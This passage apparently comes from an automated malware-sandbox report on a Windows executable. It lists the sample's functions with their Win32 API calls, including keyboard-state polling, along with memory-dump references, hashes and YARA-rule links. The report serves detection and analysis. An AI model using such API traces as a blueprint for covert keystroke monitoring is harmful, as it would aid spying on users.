                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 830647256-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00490000), ref: 0046EB4F
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(004E004F), ref: 0046EB67
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(A8DBEC3E), ref: 0046EB7F
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00750050), ref: 0046EB97
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 802431696-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00444E77
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00474335 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7d4a86683db9a09c2256a2266118b3ebdc040ee5a517fddb499b320ca0848e6c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d4a86683db9a09c2256a2266118b3ebdc040ee5a517fddb499b320ca0848e6c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00450944
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00450955
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: -----$SysListView32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4008455318-3975388722
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00448625
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateMenu.USER32 ref: 0044863C
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 004486EB
                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 004486F5
                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00448742
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 176399719-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 004692A4
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 004692C7
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2040099840-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 0046949E
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 004694C1
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CtrlParent$_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2040099840-1403004172
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3771399671-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
